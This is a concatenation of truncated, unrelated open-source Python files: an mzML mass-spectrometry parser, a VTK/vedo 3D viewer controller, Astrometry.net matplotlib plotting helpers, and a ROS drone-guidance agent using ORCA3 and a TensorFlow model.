this script can automatically convert some proprietary file types to mzML by calling ProteoWizard (see notes). :param bool verbose: Chatty enable or disable. It can be useful to enable this when processing large files or long acquisitions, as many of the methods have progress reporters. :param int precision: The floating point precision to use if converting to mzML. Default 64 (although this appears to have a minimal effect in the experience of the author). This can be set to 32 to decrease mzML file sizes. :param bool compression: Whether or not to compress the mzML files when converting. This can decrease file sizes at a slight cost in processing time. :param bool gzip: Whether or not to gzip the mzML files when converting. This substantially decreases file sizes (mass spectrometric data compresses very well when gzipped). This will slightly increase processing time. :param str obo: A specific path or URL to an *.obo file defining the accession keys used in mzML files. If this is not specified, the default accession URL will be used to download the required obo file. This should not be necessary normally, as most of the commonly encountered accession keys are hard-coded into this script. The script will raise an error if it encounters an undefined accession key. :param bool ftt: Whether to run the function_timetic() method on initialization. This is useful if you require access to the total ion current and time lists for each function in the mzML file. This does increase file load times quite significantly (~6x slower). **Notes** An mzML file is a data format for mass spectrometric data which can be parsed by python (avoiding the pitfalls associated with the proprietary files usually generated by the mass spectrometers themselves). The mzML file structures are expected to conform to those outlined in the HUPO Proteomics Standards Working Group. More information can be found at https://raw.githubusercontent.com/HUPO-PSI/psi-ms-CV/master/psi-ms.obo If you wish to use the format conversion functionality of this script, you will need to download and install ProteoWizard, which can be found at http://proteowizard.sourceforge.net/ """ # store keyword settings self.verbose = verbose self.precision = precision self.compression = compression self.gzip_file = gzip_file self.obo = obo self.filename = self.check_for_file(filename) # load file and determine key properties if self.verbose is True: # todo why is this not an instantiation self.Progress = Progress sys.stdout.write('Loading %s into memory' % self.filename) sys.stdout.flush() if self.filename.lower().endswith('.mzml.gz'): # if mzml is gzipped handle = gzip.open(self.filename) # unzip the file else: handle = self.filename try: self.tree = xml.dom.minidom.parse(handle) # full mzML file except: raise IOError( 'The mzML file "%s" could not be loaded. The file is either unsupported, corrupt, or incomplete.' % self.filename) self.nscans = int(self.tree.getElementsByTagName('spectrumList')[0].getAttribute('count')) # number of spectra self.nchroms = int( self.tree.getElementsByTagName('chromatogramList')[0].getAttribute('count')) # number of chromatograms self.functions = {} for spectrum in self.tree.getElementsByTagName('spectrum'): func, proc, scan = fps(spectrum) # extract each value and convert to integer if func not in self.functions: # if function is not defined yet p = branch_cvparams(spectrum) # pull spectrum's cvparameters self.functions[func] = { 'sr': [int(spectrum.getAttribute('index')), None], # the scan index range that the function spans 'nscans': 1, # number of scans } self.functions[func].update(scan_properties(p)) # update with scan properties else: self.functions[func]['sr'][1] = int( spectrum.getAttribute('index')) # otherwise set the scan index range to the current index self.functions[func]['nscans'] += 1 p = branch_cvparams(spectrum) # pull properties of final spectrum self.duration = p['MS:1000016'].value # final start scan time if self.verbose is True: sys.stdout.write(' DONE\n') self.BE = BoundsError() # load warning instance for integration self.ftt = False if ftt is True: self.function_timetic() def __str__(self): """The string that is returned when printed""" return f'{self.__class__.__name__} {self.nscans} spectra, {self.nchroms} chromatograms' def __repr__(self): """The representation that is returned""" return "%s('%s')" % (self.__class__.__name__, self.filename) def __len__(self): return self.nscans def __getitem__(self, ind): """retrieves a scan or summed scans""" if isinstance(ind, slice): # if getitem is trying to slice """ returns the summed scans with the supplied indicies slice will assume that the intended function is 1 """ if ind.start is None: # no start start = 0 else: start = ind.start if ind.stop is None: # no stop stop = self.functions[1]['sr'][1] else: stop = ind.stop return self.sum_scans(start, stop, mute=True) elif type(ind) is int: # scan index number """will return the spectrum of the scan index provided""" if ind < 0 or ind > self.nscans: raise IndexError("The scan index number #%d is outside of the mzML's scan index range (0-%d)" % ( ind, self.nscans - 1)) for spectrum in self.tree.getElementsByTagName('spectrum'): attr = branch_attributes(spectrum) if attr['index'] == ind: return extract_spectrum(spectrum) elif type(ind) is float: # timepoint in function 1 """float will assume the intended function was 1""" if ind < 0 or ind > self.duration: raise ValueError( "The supplied time %.3f is outside of this file's time range (0 - %.3f)" % (ind, self.duration)) ind = self.scan_index(ind) for spectrum in self.tree.getElementsByTagName('spectrum'): attr = branch_attributes(spectrum) if attr['index'] == ind: return extract_spectrum(spectrum) def foreachchrom(self, fn): """ a decorator function that will apply the supplied function to every chromatogram in the mzml file the supplied function will be handed the chromatogram XML object as the first argument the decorated function will return a list of outputs of the supplied function where each index corresponds to a scan e.g.:: loaded = mzML(filename) @loaded.foreachchrom def do_this(chrom): # extract the attributes using the mzML.attributes() method attr = loaded.attributes(chrom) return attr['id'] # return the name of the chromatogram do_this() """ def foreachchrom(*args, **kwargs): """decorates the supplied function to run for every scan""" prog = Progress(string='Applying function "%s" to chromatogram' % fn.__name__, last=self.nchroms) out = [] for chromatogram in self.tree.getElementsByTagName('chromatogram'): if self.verbose is True: prog.write(int(chromatogram.getAttribute('index')) + 1) out.append(fn(chromatogram, *args, **kwargs)) if self.verbose is True: prog.fin() return out return foreachchrom def foreachscan(self, fn): """ a decorator function that will apply the supplied function to every spectrum in the mzml file the supplied function
:param context: Context of the visualization :param embed_ui: Whether the UI is embed within the VTK window :param embed_font_size: Embed font size. Defaults to 16 points. You might need larger values in case you have a small screen with high dpi (but VTK methods fail to detect that). :param jupyter: Whether we're running from a jupyter notebook or not :param offscreen: Whether the rendering is done offscreen (headless) or not :param plot: A vedo Plotter instance. You can either create it by yourself before hand, in case you want to have multiple windows with other stats or let the controller create a new one :param plot_window_id: Sub-window id where the 3D visualization will be displayed :param num_windows: Number of subwindows, in case you want to display your own stuff later :param render: Whether rendering occurs at the end of the initialization or not. Defaults to False :param dark_mode: Whether the viewer is in dark mode :param auto_select_first_object: Auto select the first object displayed :param silent: Whether printing to console is disabled or not """ self.silent = silent if not silent: print('IBL Viewer...') self.model.ui.font_size = embed_font_size self.model.web_ui = jupyter if self.model.web_ui: vedo.embedWindow('ipyvtk') self.plot = plot window_size = self.model.web_window_size if self.model.web_ui else self.model.window_size if plot is None: self.plot = vedo.Plotter(N=num_windows, size=window_size, title=self.model.title, bg=self.model.ui.background_color, offscreen=offscreen or jupyter) self.plot_window_id = plot_window_id self.plot.window.SetSize(*window_size) self.set_renderer() self.set_dark_mode(dark_mode, False) ''' if jupyter: self.plot.offscreen = offscreen if offscreen is not None else offscreen is None self.plot.window.SetOffScreenRendering(self.plot.offscreen) ''' try: # In cases where we are headless, this will fail because there is no interactor # but in cases where a headless window is embed into an app like Qt, this will work # So everything's fine like this self.initialize_window_interactions() except Exception: pass self.model.ui.embed = embed_ui if self.model.ui.embed: self.model.ui.visible = True self.model.ui.set_context(UIModel.DEFAULT) self.initialize_vtk_ui(self.model.ui.embed_menu_x, self.model.ui.embed_menu_y) self.update_ui() # Generic UI part: prepares the cursor and draws a box outline on the selected object self.initialize_selection_ui() self.initialized() #logging.info('Initialization complete.') def initialize_window_interactions(self): """ Initialize window interactions on the VTK window """ # LeftButtonReleaseEvent does not work. You have to use EndInteractionEvent instead (go figure...) # see https://stackoverflow.com/questions/52209534 self.add_callback('LeftButtonPressEvent', self.handle_left_mouse_press) self.add_callback('EndInteractionEvent', self.handle_left_mouse_release) self.plot.interactor.AddObserver('TimerEvent', self.handle_timer) self.plot.interactor.AddObserver('KeyPressEvent', self.handle_key_press) def initialize_selection_ui(self): """ Initialize selection marker and text """ #if self.model.ui.embed: self.selection_info = self.add_text('selection_info', '', [0.02, 0.95], color=self.model.ui.color) self.plot.add(self.selection_info, render=False) self.set_selection_marker() def handle_key_press(self, iren, event): """ Handle key press events :param iren: vtk iren :param event: vtk event """ key = iren.GetKeySym().lower() if 'esc' in key: iren.ExitCallback() elif 'space' in key: self.clear_line_widget() self.clear_box_widget() def exit_interactive_mode(self): """ Exit/leave interactive mode """ self.plot.window.ExitCallback() def toggle_dark_mode(self): """ Toggle dark/light mode """ self.set_dark_mode(not self.model.ui.dark_mode) def set_dark_mode(self, on=True, update_ui=True): """ Set dark mode on or off """ self.model.ui.set_dark_mode(on) if self.plot is not None: self.plot.backgroundColor(self.model.ui.background_color) if self.color_bar is not None: self.update_element_color(self.color_bar) if not update_ui: return if self.model.ui.embed: all_elements = self.model.ui.all_elements() for key in all_elements: element = all_elements[key] self.update_element_color(element) def set_renderer(self): """ Set VTK renderer, attempts to use OSPRay, if available OSPRay is not supported (2021) by default and there is no pip wheel for it with vtk, or paraview or any vtk-based tool. So you can only rely on OSPRay if you compile it alongside VTK. """ renderer = self.plot.renderer try: ospray_pass= vtk.vtkOSPRayPass() renderer.SetPass(ospray_pass) node = vtk.vtkOSPRayRendererNode() node.SetSamplesPerPixel(4,renderer) node.SetAmbientSamples(4,renderer) node.SetMaxFrames(4, renderer) except (AttributeError, ImportError, NameError): pass # For some reason, depth peeling is sometimes not activated # so it's further made active in volume.SlicerView.initialize_mapper() # If you don't know about depth peeling: https://vtk.org/Wiki/VTK/Depth_Peeling for renderer in self.plot.renderers: renderer.UseDepthPeelingForVolumesOn() renderer.SetOcclusionRatio(0.001) renderer.SetMaximumNumberOfPeels(100) def register_object(self, vtk_object, name=None, selectable=True): """ Register an object as selectable by the user in the UI :param vtk_object: VTK object :param name: Name or given id. IF None, the name of the object is used """ if name is None: name = vtk_object.name existing_obj = self.objects.get(name) if existing_obj != vtk_object and name in self.objects: # Then we have two same names for two different objects # let's change that name = self.get_unique_object_name(name) self.objects[name] = vtk_object if selectable: vtk_object.SetPickable(True) # We overwrite the vtk object's name with the new one vtk_object.name = name self.update_selection_slider() self.objects_changed() def get_unique_object_name(self, name, spacer='_'): """ Get a unique key/name for selectable objects with similar names :param name: Name (for instance 'Points') :param spacer: Spacer char :return: New name, for instance 'Points_4' """ return utils.get_unique_name(self.objects, name, spacer) def unregister_object(self, name): """ Unregister an object from the selectable objects list :param name: Object name or given id or int or the object itself """ if isinstance(name, int): keys = list(self.objects.keys()) try: name = keys[name] except Exception: pass elif not isinstance(name, str): for key in self.objects: if name == self.objects[key]: name = key break del self.objects[name] self.update_selection_slider() def update_selection_slider(self, max_value=None): """ Update the selection slider max value :param max_value: Max value. If None, the maximum value is the length of the self.objects """ if max_value is None: max_value = len(self.objects)-1 slider = self.widgets.get('selection') if slider is not None: slider.GetRepresentation().SetMinimumValue(0) slider.GetRepresentation().SetMaximumValue(max_value) def register_controller(self, controller, vtk_objects): """ Register/map VTK objects to a view :param controller: A controller instance (like VolumeController) :param vtk_objects: All objects directly related to this view """ self.register_object(controller.actor) if not isinstance(vtk_objects, list): vtk_objects = [vtk_objects] for obj in vtk_objects: self.controllers_map[obj] = controller def get_view_objects(self): """ Get all view objects registered in this model :return: List """ return list(self.controllers_map.keys()) def get_view_objects_names(self): """ Get view objects names :return: Dict """ names = {} for obj in self.controllers_map: names[obj.name] = obj return names def get_window(self): """ Get the plot window object. This is useful for displaying this window in Jupyter notebooks for instance :return: iren window object """ return self.plot.window def render(self, save_to_file=None, width=None, height=None, scale=1): """ Render the current state of the viewer, optionally to a file. Supported formats are jpg, png, pdf, svg, eps :param save_to_file: File path :param width: Width of the rendered image :param height: Height of the rendered image :param scale: Rendering scale factor. Defaults to 1 """ self.plot.render() if save_to_file is not None: custom_size = isinstance(width, int) and isinstance(height, int) if custom_size: current_width, current_height = self.plot.window.GetSize() # Set the desired size self.plot.window.SetSize(width, height) self.plot.show() if scale > 1: # Apparently it's better to enable the setting below when we use # scaling for larger size rendering. # There's a typo in the variable name and even the variable name # is inappropriate. This isn't a screenshot but a render. (@marcomusy) # So I put that in a try catch just in case it changes in the future... try: vedo.settings.screeshotLargeImage = True except Exception: pass vedo.screenshot(save_to_file, scale) if custom_size: # Now reset the size as it was self.plot.window.SetSize(current_width, current_height) self.plot.show() def show(self, interactive=True, actors=None, at=0, **kwargs): """ Render the plot and let the user interact with it :param interactive: Whether we render and make the window interactive :param actors: List of actors to show. Use this parameter only if you know what you're doing. :param at: Which VTK window to use. Defaults to 0 """ if actors is not None: actors_to_show = actors else: actors_to_show = self.plot.actors if self.model.selection is None: self.select(-1) #self.view_selected() if not interactive: self.plot.render() if self.model.web_ui: logging.info(f'\nVisualizer started in Web UI mode: ' + str(utils.time_diff(self.model.runtime)) + 's\n') return self.plot.show(actors_to_show, at=at, resetcam=False, interactive=interactive, **kwargs) #return ViewInteractiveWidget(self.plot.window) else: logging.info('\nVisualizer started: ' + str(utils.time_diff(self.model.runtime)) + 's\n') #self.plot.window.SetWindowName() return self.plot.show(actors_to_show, at=at, resetcam=False, interactive=interactive, **kwargs) def close(self): """ Close the current plot """ self.plot.close() def add_callback(self, event_name, func, priority=0.0): """ Add an event listener (aka callback method) :param event_name: A VTK event name :param func: Listener function :param priority: Priority in event queue :return: Callback id """ return utils.add_callback(self.plot, event_name, func, priority) def remove_callback(self, callback_id): """ Add an event listener (aka callback method) :param callback_id_or_event_name: A VTK event name """ self.plot.interactor.RemoveObserver(callback_id) def handle_timer(self, iren, event, **kwargs): """ Handle vtk timer event :param iren: Render window :param event: TimerEvent """ if self.model.animation_playing: valid = self.next_time_series() if not valid: self.plot.interactor.DestroyTimer(self.model.timer_id) def
# This file is part of the Astrometry.net suite. # Licensed under a 3-clause BSD style license - see LICENSE from __future__ import print_function import matplotlib.cm import matplotlib.colors import matplotlib.patches import numpy as np import pylab as plt from matplotlib.ticker import FixedFormatter import functools class NanColormap(matplotlib.colors.Colormap): ''' A Colormap that wraps another colormap, but replaces non-finite values with a fixed color. ''' def __init__(self, cmap, nancolor): self.cmap = cmap self.nanrgba = matplotlib.colors.colorConverter.to_rgba(nancolor) def __call__(self, data, **kwargs): rgba = self.cmap(data, **kwargs) # 'data' is a MaskedArray, apparently... if np.all(data.mask == False): return rgba iy,ix = np.nonzero(data.mask) #print 'NanColormap: replacing', len(iy), 'pixels with', self.nanrgba # nanrgba are floats in [0,1]; convert to uint8 in [0,255]. rgba[iy,ix, :] = np.clip(255. * np.array(self.nanrgba), 0, 255).astype(np.uint8) return rgba def __getattr__(self, name): ''' delegate to underlying colormap. ''' return getattr(self.cmap, name) def _imshow_better_defaults(imshowfunc, X, interpolation='nearest', origin='lower', cmap='gray', ticks=True, **kwargs): ''' An "imshow" wrapper that uses more sensible defaults. ''' X = imshowfunc(X, interpolation=interpolation, origin=origin, cmap=cmap, **kwargs) if not ticks: plt.xticks([]); plt.yticks([]) return X def _imshow_nan(imshowfunc, X, nancolor='0.5', cmap=None, vmin=None, vmax=None, **kwargs): ''' An "imshow" work-alike that replaces non-finite values by a fixed color. ''' if np.all(np.isfinite(X)): return imshowfunc(X, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs) # X has non-finite values. Time to get tricky. cmap = matplotlib.cm.get_cmap(cmap) cmap = NanColormap(cmap, nancolor) if vmin is None or vmax is None: I = np.flatnonzero(np.isfinite(X)) if vmin is None: try: vmin = X.flat[I].min() except ValueError: vmin = 0. if vmax is None: try: vmax = X.flat[I].max() except ValueError: vmax = 0. return imshowfunc(X, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs) ''' A plt.imshow() work-alike, except with defaults: interpolation='nearest', origin='lower'. ''' imshow_better_defaults = functools.partial(_imshow_better_defaults, plt.imshow) ''' A plt.imshow() work-alike, except handles non-finite values. Accepts an additional kwarg: nancolor='0.5' ''' imshow_nan = functools.partial(_imshow_nan, plt.imshow) ''' My version of plt.imshow that uses imshow_better_defaults and imshow_nan. ''' dimshow = functools.partial(_imshow_better_defaults, imshow_nan) def replace_matplotlib_functions(): ''' Replaces plt.imshow with a function that handles non-finite values and has the defaults interpolation='nearest', origin='lower'. ''' plt.imshow = dimshow class PlotSequence(object): def __init__(self, basefn, format='%02i', suffix='png', suffixes=None): self.ploti = 0 self.basefn = basefn self.format = format if suffixes is None: self.suffixes = [suffix] else: self.suffixes = suffixes self.pattern = self.basefn + '-%s.%s' self.printfn = True def skip(self, n=1): self.ploti += n def skipto(self, n): self.ploti = n def getnextlist(self): #lst = ['%s-%s.%s' % (self.basefn, self.format % self.ploti, suff) lst = [self.pattern % (self.format % self.ploti, suff) for suff in self.suffixes] self.ploti += 1 return lst def getnext(self): lst = self.getnextlist() if len(lst) == 1: return lst[0] return lst def savefig(self, **kwargs): import pylab as plt for fn in self.getnextlist(): plt.savefig(fn, **kwargs) if self.printfn: print('saved', fn) def loghist(x, y, nbins=100, hot=True, doclf=True, docolorbar=True, lo=0.3, imshowargs={}, clampxlo=False, clampxlo_val=None, clampxlo_to=None, clampxhi=False, clampxhi_val=None, clampxhi_to=None, clampylo=False, clampylo_val=None, clampylo_to=None, clampyhi=False, clampyhi_val=None, clampyhi_to=None, clamp=None, clamp_to=None, **kwargs): #np.seterr(all='warn') if doclf: plt.clf() myargs = kwargs.copy() if not 'bins' in myargs: myargs['bins'] = nbins rng = kwargs.get('range', None) x = np.array(x) y = np.array(y) if not (np.all(np.isfinite(x)) and np.all(np.isfinite(y))): K = np.flatnonzero(np.isfinite(x) * np.isfinite(y)) print('loghist: cutting to', len(K), 'of', len(x), 'finite values') x = x[K] y = y[K] if clamp is True: clamp = rng if clamp is not None: ((clampxlo_val, clampxhi_val),(clampylo_val, clampyhi_val)) = clamp if clamp_to is not None: ((clampxlo_to, clampxhi_to),(clampylo_to, clampyhi_to)) = clamp_to if clampxlo: if clampxlo_val is None: if rng is None: raise RuntimeError('clampxlo, but no clampxlo_val or range') clampxlo_val = rng[0][0] if clampxlo_val is not None: if clampxlo_to is None: clampxlo_to = clampxlo_val x[x < clampxlo_val] = clampxlo_to if clampxhi: if clampxhi_val is None: if rng is None: raise RuntimeError('clampxhi, but no clampxhi_val or range') clampxhi_val = rng[0][1] if clampxhi_val is not None: if clampxhi_to is None: clampxhi_to = clampxhi_val x[x > clampxhi_val] = clampxhi_to if clampylo: if clampylo_val is None: if rng is None: raise RuntimeError('clampylo, but no clampylo_val or range') clampylo_val = rng[1][0] if clampylo_val is not None: if clampylo_to is None: clampylo_to = clampylo_val y[y < clampylo_val] = clampylo_to if clampyhi: if clampyhi_val is None: if rng is None: raise RuntimeError('clampyhi, but no clampyhi_val or range') clampyhi_val = rng[1][1] if clampyhi_val is not None: if clampyhi_to is None: clampyhi_to = clampyhi_val y[y > clampyhi_val] = clampyhi_to (H,xe,ye) = np.histogram2d(x, y, **myargs) L = np.log10(np.maximum(lo, H.T)) myargs = dict(extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto', interpolation='nearest', origin='lower') myargs.update(imshowargs) plt.imshow(L, **myargs) if hot: plt.hot() if docolorbar: r = [np.log10(lo)] + list(range(int(np.ceil(L.max())))) # print 'loghist: L max', L.max(), 'r', r plt.colorbar(ticks=r, format=FixedFormatter( ['0'] + ['%i'%(10**ri) for ri in r[1:]])) #set_fp_err() return H, xe, ye def plothist(x, y, nbins=100, log=False, doclf=True, docolorbar=True, dohot=True, plo=None, phi=None, scale=None, imshowargs={}, **hist2dargs): if log: return loghist(x, y, nbins=nbins, doclf=doclf, docolorbar=docolorbar, dohot=dohot, imshowargs=imshowargs) #, **kwargs) if doclf: plt.clf() (H,xe,ye) = np.histogram2d(x, y, nbins, **hist2dargs) if scale is not None: H *= scale myargs = dict(extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto', interpolation='nearest', origin='lower') vmin = None if plo is not None: vmin = np.percentile(H.ravel(), plo) myargs.update(vmin=vmin) if phi is not None: vmin = imshowargs.get('vmin', vmin) vmax = np.percentile(H.ravel(), phi) if vmax != vmin: myargs.update(vmax=vmax) myargs.update(imshowargs) plt.imshow(H.T, **myargs) if dohot: plt.hot() if docolorbar: plt.colorbar() return H, xe, ye def setRadecAxes(ramin, ramax, decmin, decmax): rl,rh = ramin,ramax dl,dh = decmin,decmax rascale = np.cos(np.deg2rad((dl+dh)/2.)) ax = [rh,rl, dl,dh] plt.axis(ax) plt.gca().set_aspect(1./rascale, adjustable='box', anchor='C') plt.xlabel('RA (deg)') plt.ylabel('Dec (deg)') return ax import matplotlib.colors as mc class ArcsinhNormalize(mc.Normalize): def __init__(self, mean=None, std=None, **kwargs): self.mean = mean self.std = std mc.Normalize.__init__(self, **kwargs) def _map(self, X, out=None): Y = (X - self.mean) / self.std args = (Y,) if out is not None: args = args + (out,) return np.arcsinh(*args) def __call__(self, value, clip=None): # copied from Normalize since it's not easy to subclass if clip is None: clip = self.clip result, is_scalar = self.process_value(value) self.autoscale_None(result) vmin, vmax = self.vmin, self.vmax if vmin > vmax: raise ValueError("minvalue must be less than or equal to maxvalue") elif vmin == vmax: result.fill(0) # Or should it be all masked? Or 0.5? else: vmin = float(vmin) vmax = float(vmax) if clip: mask = ma.getmask(result) result = ma.array(np.clip(result.filled(vmax), vmin, vmax), mask=mask) # ma division is very slow; we can take a shortcut resdat = result.data self._map(resdat, resdat) vmin = self._map(vmin) vmax = self._map(vmax) resdat -= vmin resdat /= (vmax - vmin) result = np.ma.array(resdat, mask=result.mask, copy=False) if is_scalar: result = result[0] return result from matplotlib.colors import LinearSegmentedColormap # a colormap that goes from white to black: the opposite of matplotlib.gray() antigray = LinearSegmentedColormap('antigray', {'red': ((0., 1, 1), (1., 0, 0)), 'green': ((0., 1, 1), (1., 0, 0)), 'blue': ((0., 1, 1), (1., 0, 0))}) bluegrayred = LinearSegmentedColormap('bluegrayred', {'red': ((0., -1, 0), (1., 1, -1)), 'green': ((0., -1, 0), (0.5,0.5, 0.5), (1., 0, -1)), 'blue': ((0., -1, 1), (1., 0, -1))}) # x, y0, y1 _redgreen_data = {'red': ((0., -100, 1), #(0.5, 0, 0), #(0.5, 0.1, 0), (0.49, 0.1, 0), (0.491, 0, 0), (0.51, 0, 0), (0.511, 0, 0.1), (1., 0, -100)), 'green': ((0., -100, 0), #(0.5, 0, 0), #(0.5, 0, 0.1), (0.49, 0.1, 0), (0.491, 0, 0), (0.51, 0, 0), (0.511, 0, 0.1), (1., 1, -100)), 'blue': ((0., -100, 0), (1., 0, -100))} redgreen = LinearSegmentedColormap('redgreen', _redgreen_data) def hist_ints(x, step=1, **kwargs): ''' Creates a histogram of integers. The number of bins is set to the range of the data (+1). That is, each integer gets its own bin. ''' kwargs['bins'] = x.max()/step - x.min()/step + 1 kwargs['range'] = ( (x.min()/int(step))*step - 0.5, ((x.max()/int(step))*step + 0.5) ) return plt.hist(x, **kwargs) def hist2d_with_outliers(x, y, xbins, ybins, nout): ''' Creates a 2D histogram from the given data, and returns a list of the indices in the data of points that lie in low-occupancy cells (where the histogram counts is < "nout"). The "xbins" and "ybins" arguments are passed to numpy.histogram2d. You probably want to show the histogram with: (H, outliers, xe, ye) = hist2d_with_outliers(x, y, 10, 10, 10) imshow(H, extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto') plot(x[outliers], y[outliers], 'r.') Returns: (H, outliers, xe, ye) H: 2D histogram image outliers: array of integer indices of the outliers xe: x edges chosen by histgram2d ye: y edges chosen by histgram2d ''' # returns (density image, indices of outliers) (H,xe,ye) = plt.histogram2d(x, y, (xbins,ybins))
<reponame>JoseAndresMR/jamrepo #!/usr/bin/env python2 # -*- coding: utf-8 -*- #!/usr/bin/env python2 # -*- coding: utf-8 -*- # ---------------------------------------------------------------------------------------------------------------------- # ROS-MAGNA # ---------------------------------------------------------------------------------------------------------------------- # The MIT License (MIT) # Copyright (c) 2016 GRVC University of Seville # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the # Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS # OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # ---------------------------------------------------------------------------------------------------------------------- """ Created on Mon Feb 21 2018 @author: josmilrom """ import sys import rospy import std_msgs.msg import time import math import numpy as np import tf # import rvo2 import rvo23d import time # from cv_bridge import CvBridge, CvBridgeError from uav_abstraction_layer.srv import * from geometry_msgs.msg import * from sensor_msgs.msg import * # import tensorflow as tflow # from tensorflow.python.tools import inspesct_checkpoint as chkp class Agent_NAI(object): def __init__(self,ID): # Local parameters inizialization from arguments self.ID = ID self.smooth_path_mode = 0 self.algorithms_dicc = {} self.GettingWorldDefinition() # Global ROS parameters inizialization # self.timer_start = time.time() # Function to decide which algorithm is used for new velocity depending on parameters def Guidance(self,desired_speed): self.NeighborSelector(int(self.algorithms_dicc["orca3"]["N_neighbors_aware"])+1) self.desired_speed = desired_speed # print "loop time", time.time() - self.timer_start # self.timer_start = time.time() if "simple" in self.algorithms_dicc.keys(): return self.SimpleGuidance() if "neural_network" in self.algorithms_dicc.keys(): return self.NeuralNetwork() # elif self.algorithms_dicc[0] == "orca": # return self.ORCA() if "orca3" in self.algorithms_dicc.keys(): return self.ORCA3() # return self.ORCA3_from_node() # Function to set new velocity using a Neural Network def NeuralNetwork(self): # If the solver is a neural network, make some additional initializations if not hasattr(self,'nn_loaded'): self.nn_loaded = True self.session = tflow.Session() # Start a TensorFlow session self.learning_dataset_def = {"teacher_role" : self.role, "teacher_algorithm" : "orca3", "N_neighbors_aware" : self.algorithms_dicc["neural_network"]["N_neighbors_aware"]} gml_folder_path = "/home/{0}/Libraries/gml".format("joseandresmr") self.session_path = gml_folder_path + "/Sessions/{0}/{1}/{2}".format(self.learning_dataset_def["teacher_role"],self.learning_dataset_def["teacher_algorithm"],self.learning_dataset_def["N_neighbors_aware"]) # Import the metagraph from specific path. In the future will be better path management new_saver = tflow.train.import_meta_graph(self.session_path + "/model.meta") # Restore to the last chechpoint new_saver.restore(self.session,tflow.train.latest_checkpoint(self.session_path)) # Initialize inputs and outputs from graph self.graph_inputs = tflow.get_default_graph().get_tensor_by_name("single_input:0") self.graph_outputs = tflow.get_default_graph().get_tensor_by_name("vel_posttreated:0") # self.single_vel_logits_tensor = tflow.get_default_graph().get_tensor_by_name("single_vel_logits:0") # Definition of neural network's inputs and outputs for every role. # In the future this will be imported from a common place if self.role == "path": input_dicc = ['own_vel','goal_pose_rel','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] elif self.role == "agent_ad": input_dicc = ['own_vel','goal_pose_rel','goal_vel','distance','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] elif self.role == "agent_ap": input_dicc = ['own_vel','goal_pose_rel','goal_vel','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] # Initialization of pos and vel that will be taken as inputs inputs = [] main_agent_pos = self.agents_data_list[self.ID-1].position.pose main_agent_vel = self.agents_data_list[self.ID-1].velocity.twist.linear # For every input in the dictionary, crate if needed and add it to inputs for n_input in input_dicc: # own vel if n_input == "own_vel": inputs += [main_agent_vel.x,main_agent_vel.y,main_agent_vel.z] # own goal elif n_input == "goal_pose_rel": goal_lin_rel = self.OperatePoses(self.goal["pose"],main_agent_pos,'-').position inputs += [goal_lin_rel.x,goal_lin_rel.y,goal_lin_rel.z] elif n_input == "goal_vel": inputs += [self.goal["vel"].linear.x,self.goal["vel"].linear.y,self.goal["vel"].linear.z] elif n_input == "distance": inputs.append(self.goal["dist"]) elif n_input == "others_pos_rel": for n_neighbor in range(self.algorithms_dicc["neural_network"]["N_neighbors_aware"]): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] other_pos_rel = self.OperatePoses(self.agents_data_list[n_agent].position.pose,main_agent_pos,'-').position inputs += [other_pos_rel.x,other_pos_rel.y,other_pos_rel.z] elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": n_obs = self.near_neighbors_sorted["ids"][n_neighbor] obs_pose = self.obs_pose_list[n_obs] other_pos_rel = self.OperatePoses(self.PoseFromArray(obs_pose),main_agent_pos,'-').position inputs += [other_pos_rel.x,other_pos_rel.y,other_pos_rel.z] elif n_input == "others_vel": for n_neighbor in range(self.algorithms_dicc["neural_network"]["N_neighbors_aware"]): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] other_vel_lin = self.agents_data_list[n_agent].velocity.twist.linear inputs += [other_vel_lin.x,other_vel_lin.y,other_vel_lin.z] elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": inputs += [0,0,0] # Reshape the inputs to a single row inputs_trans = np.asarray(inputs) inputs_trans = inputs_trans.reshape((1, inputs_trans.shape[0])) # Run session once to predict new selected velocity selected_velocity = self.session.run(self.graph_outputs, feed_dict={self.graph_inputs:inputs_trans}) # Depict the output into the defined variables output_index = 0 for n_output in output_dicc: if n_output == "sel_vel": selected_velocity = selected_velocity[0][output_index:output_index+3] # Construct the twist new_velocity_twist = Twist(Vector3(selected_velocity[0],selected_velocity[1],selected_velocity[2]),Vector3(0,0,0)) output_index += 3 # print("nn",new_velocity_twist) # self.ORCA3() print(new_velocity_twist) return new_velocity_twist # Function to set velocity using ORCA on 3D def ORCA3(self): self.algorithms_dicc["orca3"]["N_neighbors_aware"] = int(self.algorithms_dicc["orca3"]["N_neighbors_aware"]) params_dicc = self.algorithms_dicc["orca3"] # Give value to orca algorithm parameters timeStep = params_dicc["timeStep"] # 1/60. float The time step of the simulation. Must be positive. neighborDist = params_dicc["neighborDist"] # 1.5 float The maximal distance (center point to center point) to other agents the agent takes into account in the navigation maxNeighbors = params_dicc["N_neighbors_aware"] # 5 size_t The maximal number of other agents the agent takes into account in the navigation timeHorizon = params_dicc["timeHorizon"] # 2.5 float The minimal amount of time for which the agent's velocities that are computed by the simulation are safe with respect to 